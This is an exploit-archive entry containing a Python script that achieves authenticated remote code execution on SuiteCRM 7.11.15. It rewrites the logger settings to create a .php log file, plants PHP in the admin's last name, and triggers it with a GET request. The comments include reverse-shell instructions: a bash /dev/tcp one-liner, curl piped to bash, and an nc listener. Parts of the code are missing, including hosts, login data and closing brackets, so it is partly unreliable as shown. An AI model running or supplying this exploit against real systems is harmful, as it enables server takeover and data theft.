Exploits / Vulnerability Discovered : 2020-11-09 |
Type : webapps |
Platform : php
This exploit / vulnerability Suitecrm 7.11.15 last_name remote code execution (authenticated) is for educational purposes only and if it is used you will do on your own risk!
from requests import Session
from random import choice
from string import ascii_lowercase
url = "" # URL to remote host web root
post_url = "{url}index.php".format(url=url)
user_name = "admin" # User must be an administrator
password = "admin"
prefix = 'shell-'
file_name = '{prefix}{rand}.php'.format(
rand=''.join(choice(ascii_lowercase) for _ in range(6))
# *Recommend K.I.S.S as some characters are escaped*
# Example for reverse shell:
# Put 'bash -c '(bash -i >& /dev/tcp/ 0>&1)&' inside a file named shell.sh
# Stand up a python web server `python -m http.server 80` hosting shell.sh
# Set a nc listener to catch the shell 'nc -nlvp 8080'
command = '<?php `curl -s | bash`; ?>'.format(fname=file_name)
# Payload to set logging to 'info' and create a log file in php format.
modify_system_settings_data = {
"action": (None, "SaveConfig"),
"module": (None, "Configurator"),
"logger_file_name": (None, file_name), # Set file extension in the file name as it isn't checked here
"logger_file_ext": (None, ''), # Bypasses file extension check by just not setting one.
"logger_level": (None, "info"), # This is important for your php code to make it into the logs
"save": (None, "Save")
# Payload to put php code into the malicious log file
poison_log = {
"module": (None, "Users"),
"record": (None, "1"),
"action": (None, "Save"),
"page": (None, "EditView"),
"return_action": (None, "DetailView"),
"user_name": (None, user_name),
"last_name": (None, command),
# Payload to restore the log file settings to default after the exploit runs
restore_log = {
"action": (None, "SaveConfig"),
"module": (None, "Configurator"),
"logger_file_name": (None, "suitecrm"), # Default log file name
"logger_file_ext": (None, ".log"), # Default log file extension
"logger_level": (None, "fatal"), # Default log file setting
"save": (None, "Save")
# Start of exploit
with Session() as s:
# Authenticating as the administrator
s.get(post_url, params={'module': 'Users', 'action': 'Login'})
print('[+] Got initial PHPSESSID:', s.cookies.get_dict()['PHPSESSID'])
s.post(post_url, data=login_data)
if 'ck_login_id_20' not in s.cookies.get_dict().keys():
print('[-] Invalid password for: {user}'.format(user=user_name))
print('[+] Authenticated as: {user}. PHPSESSID: {cookie}'.format(
# Modify the system settings to set logging to 'info' and create a log file in php format
print('[+] Modifying log level and log file name.')
print('[+] File name will be: {fname}'.format(fname=file_name))
settings_header = {'Referer': '{url}?module=Configurator&action=EditView'.format(url=url)}
s.post(post_url, headers=settings_header, files=modify_system_settings_data)
# Post to update the administrator's last name with php code that will poison the log file
print('[+] Poisoning log file with php code: {cmd}'.format(cmd=command))
command_header = {'Referer': '{url}?module=Configurator&action=EditView'.format(url=url)}
s.post(url, headers=command_header, files=poison_log)
# May be a good idea to put a short delay in here to allow your code to make it into the logfile.
# Up to you though...
# Do a get request to trigger php code execution.
print('[+] Executing code. Sending GET request to: {url}{fname}'.format(url=url, fname=file_name))
execute_command = s.get('{url}/{fname}'.format(url=url, fname=file_name), timeout=1)
if not execute_command.ok:
print('[-] Exploit failed, sorry... Might have to do some modifications.')
# Restoring log file to default
print('[+] Setting log back to defaults')
s.post(post_url, headers=settings_header, files=restore_log)
print('[+] Done. Clean up {fname} if you care...'.format(fname=file_name))